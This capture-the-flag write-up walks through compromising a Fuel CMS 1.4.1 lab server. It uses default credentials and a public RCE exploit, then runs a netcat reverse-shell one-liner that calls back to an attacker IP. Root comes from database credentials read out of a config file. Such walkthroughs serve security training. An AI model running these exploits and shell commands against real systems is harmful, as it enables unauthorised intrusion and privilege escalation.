🕯️Ignite

A new start-up has a few issues with their web server.

1.Reconnaisance

1.1 Nmap

Using nmap to scan and identify open ports and services

nmap -sC -sV -Pn 10.10.175.187                                             ✘ INT
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 18:08 IST
Nmap scan report for 10.10.175.187
Host is up (0.16s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.06 seconds

We find open port 80 running http server with a webpage buit with Fuel CMS

2. Enumeration

Viewing the webpage, we see a path /fuel and the default credentials to access it.

Going over to /fuel, we are greeted with a login page.

Default credential, admin : admin, gives us access to the dashboard.
Looking around, we find ourselves in a dead end

3. Gaining Access

3.1 Searchsploit

Searching the exploid-db for any known exploit using searchsploit

searchsploit fuel cms

------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1)                                    | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                                    | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                                    | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)                   | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)                          | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)              | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)                            | php/webapps/50884.txt
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

We find a php rce php/webapps/50477.py
Executing the exploit, we find that we can execute any commands

python3 50477.py -u http://10.10.175.187
[+]Connecting...
Enter Command $whoami
systemwww-data

Setting up a reverse shell, using rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.66.165 4242 >/tmp/f from payloadsallthethings with a netcat listener
Stabilizing the shell

nc -lvnp 4242

listening on [any] 4242 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.175.187] 60590
/bin/sh: 0: can't access tty; job control turned off

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ ^Z
[1]  + 2416 suspended  nc -lvnp 4242
~/Desktop/Pentest/THM/ignite ❯ stty raw -echo;fg                                               ✘ TSTP 1m 29s  
[1]  + 2416 continued  nc -lvnp 4242
                                    reset
reset: unknown terminal type unknown
Terminal type? xterm-256color

We find ourselves as the user, www-data
We get the user flag in the home directory as flag.txt

4. Privilege Escalation

Going back to the webpage, we find that fuel/applications/config/database.php might contain potential username and password

Reading the contents of database.php, we get the credentials root : mememe

www-data@ubuntu:/var/www/html/fuel/application/config$ cat database.php 

<?php
defined('BASEPATH') OR exit('No direct script access allowed');
===============================================================================
$active_group = 'default';
$query_builder = TRUE;

$db['default'] = array(
	'dsn'	=> '',
	'hostname' => 'localhost',
	'username' => 'root',
	'password' => 'mememe',
	'database' => 'fuel_schema',
	'dbdriver' => 'mysqli',
	'dbprefix' => '',
	'pconnect' => FALSE,
	'db_debug' => (ENVIRONMENT !== 'production'),
	'cache_on' => FALSE,
	'cachedir' => '',
	'char_set' => 'utf8',
	'dbcollat' => 'utf8_general_ci',
	'swap_pre' => '',
	'encrypt' => FALSE,
	'compress' => FALSE,
	'stricton' => FALSE,
	'failover' => array(),
	'save_queries' => TRUE
);

// used for testing purposes
if (defined('TESTING'))
{
	@include(TESTER_PATH.'config/tester_database'.EXT);
}

Switching user as root and reading root.txt

www-data@ubuntu:/var/www/html/fuel/application/config$ su
Password: 

root@ubuntu:/var/www/html/fuel/application/config cd /root/
root@ubuntu:~ cat root.txt

PreviousIce NextJack-of-All-Trades

Last updated 3 years ago